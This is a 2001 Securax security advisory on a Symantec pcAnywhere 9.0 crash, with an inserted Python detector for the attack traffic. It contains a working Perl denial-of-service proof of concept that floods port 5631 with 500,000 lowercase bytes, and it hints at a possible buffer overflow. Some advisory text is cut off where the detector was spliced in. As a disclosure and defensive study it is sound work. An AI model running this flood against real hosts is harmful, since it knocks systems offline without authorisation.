Securax-SA-14                                               Security Advisory
belgian.networking.security                                             Dutch
Topic:          Symantec pcAnywhere 9.0 DoS / Buffer Overflow
Announced:      2001-02-08
Affects:        Symantec PcAnywhere 9.0 on Microsoft Windows 98 SE

  Note: This entire advisory is based on trial-and-error results. We cannot
        guarantee that the information below is 100% correct, since we do not
        have any source code to audit. This document is subject to change
        without prior notice.

        If you happen to find more information / problems concerning the below
        problem or further variants, please contact me at the following email
        [EMAIL PROTECTED], or you can contact [EMAIL PROTECTED]

  I.  Problem Description

  Symantec PcAnywhere is a program that will allow others (who are authorised
  to have access :)) to use your pc. It's similar to a Windows NT 4.0 terminal

  PcAnywhere (when it's configured to 'be a host pc') listens on 2 ports: 5631
  (pcanywheredata, according to nmap) and 65301 (pcanywhere). When a user
  sends certain data in a particular way, pcAnywhere will crash.

  When a large amount of data (it depends: sometimes the host will go down with
  320k characters, sometimes you will have to send 500k bytes) is sent to a
  'waiting' host on the pcanywheredata port, "AWHOST32.EXE" will crash, show
  an error on the screen, and write "Unexpected program error" to a logfile
  (with EAX, EBX, ... so read them, you'll find the yummy 0x61616161).

  Oh yeah, don't use uppercase characters, as PcAnywhere won't crash on them.
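  As an added example (not part of the Securax advisory and not pcAnywhere
  code), here is a small defender-side detector for the pattern described
  above: one client connection to a pcAnywhere host port (5631 or 65301, as
  listed in this advisory) that pushes a very large payload made up of one
  repeated lowercase byte. The flow record format, the 256 KB alert threshold
  (chosen below the 320k-500k the advisory observed) and the sample flows are
  assumptions constructed for the example.

```python
# Added example, not from the advisory: flag connections to pcAnywhere host
# ports that carry an oversized, single-byte payload. Record layout and
# thresholds are assumptions, not pcAnywhere internals.
from dataclasses import dataclass
from collections import Counter

PCANYWHERE_PORTS = {5631, 65301}   # pcanywheredata / pcanywhere, per the advisory
# The advisory saw crashes between ~320k and 500k bytes; alert well below that.
BYTES_THRESHOLD = 256 * 1024
# Fraction of the captured payload sample made up of its single most common byte.
HOMOGENEITY_THRESHOLD = 0.9


@dataclass
class Flow:
    src: str
    dst: str
    dport: int
    bytes_in: int      # bytes the client sent towards the host
    sample: bytes      # first bytes of the payload captured by the sensor


def payload_homogeneity(sample: bytes) -> float:
    """Share of the sample taken up by its most frequent byte (1.0 = one byte repeated)."""
    if not sample:
        return 0.0
    (_, count), = Counter(sample).most_common(1)
    return count / len(sample)


def classify(flow: Flow) -> list[str]:
    """Return the reasons a flow matches the advisory's crash pattern (empty = benign)."""
    reasons = []
    if flow.dport not in PCANYWHERE_PORTS:
        return reasons
    if flow.bytes_in >= BYTES_THRESHOLD:
        reasons.append(f"{flow.bytes_in} bytes to pcAnywhere port {flow.dport} "
                       f"(>= {BYTES_THRESHOLD})")
    if payload_homogeneity(flow.sample) >= HOMOGENEITY_THRESHOLD:
        reasons.append("payload is a single repeated byte")
    return reasons


def detect(flows: list[Flow]) -> dict[str, list[str]]:
    """Map each source address to the reasons its flows matched."""
    hits: dict[str, list[str]] = {}
    for f in flows:
        reasons = classify(f)
        if reasons:
            hits.setdefault(f.src, []).extend(reasons)
    return hits


# Constructed sample flows (not real capture data).
SAMPLE_FLOWS = [
    Flow("10.0.0.5", "10.0.0.20", 5631, 1200, b"\x00\x00\x00\x00\x08\x10"),  # ordinary session setup
    Flow("10.0.0.9", "10.0.0.20", 5631, 500_000, b"a" * 64),                   # the advisory's pattern
    Flow("10.0.0.7", "10.0.0.20", 80, 600_000, b"x" * 64),                     # large, but not a pcAnywhere port
]

if __name__ == "__main__":
    for src, reasons in detect(SAMPLE_FLOWS).items():
        print(src, "->", "; ".join(reasons))
```

  Both heuristics are deliberately independent: the byte-count check catches
  the volume the advisory describes even if the sensor kept no payload sample,
  and the homogeneity check catches the 0x61-filled buffer (the 0x61616161 the
  advisory mentions finding in the registers) even on a connection that was
  cut off before it reached the size threshold.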

  Why no exploit, just a lame Denial of Service?

    1.) because I suck at win32 debugging / overflowing (but I'm reading)
        /* so if I can overflow win32 progs, I'll code an exploit */
    2.) as the amount of data is variable, it's hard to overflow..

  The DoS code:



   # Symantec PcAnywhere 9.0 Denial of Service
   # -----------------------------------------
   #          by incubus <[EMAIL PROTECTED]>
   #                       http://www.hexyn.be
   #                    http://www.securax.net
   # All my love to Tessa.
   # Greetz to: f0bic, r00tdude, t0micron, senti, vorlon, cicero,
   #            Zym0tic, segfault, #[EMAIL PROTECTED]
   # Thanks to jurgen swennen, for letting me (ab)use his computer.
   # this is intended as proof of concept, do not abuse!

   use IO::Socket;
   $host = "$ARGV[0]";
   $port = 5631;                       # pcanywheredata port
   if ($#ARGV < 0) {
       print "use it like: $0 <hostname>\n";
       exit;
   }
   $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $host,
                                   PeerPort => $port) || die "damn, ";
   print "hello\n";
   # build a 500k buffer of lowercase 'a' (0x61); uppercase doesn't trigger it
   $buf = "";
   for ($counter = 0; $counter < 500000; $counter++) {
       $buf .= "\x61";
   }
   print $socket "$buf\n";
   close($socket);


  II. Impact

  If someone exploits this, then Symantec is forced to rename this product to
  PcAnyoneAnywhere or something...

  No, seriously, this could lead to a compromise of a system.

  III. Possible Workarounds

  This advisory was also  sent to Symantec ([EMAIL PROTECTED]), we'll see what
  they do with it...

  IV.  Credits
  love to Tessa.
  greetz go out to : f0bic, r00t, Zym0t1c, vorlon, cicer0, tomicron, segfau|t,
                     and so many, many  others I forgot...

For more information                                      [EMAIL PROTECTED]
Website                                                http://www.securax.org
Advisories/Text                                   http://www.securax.org/pers
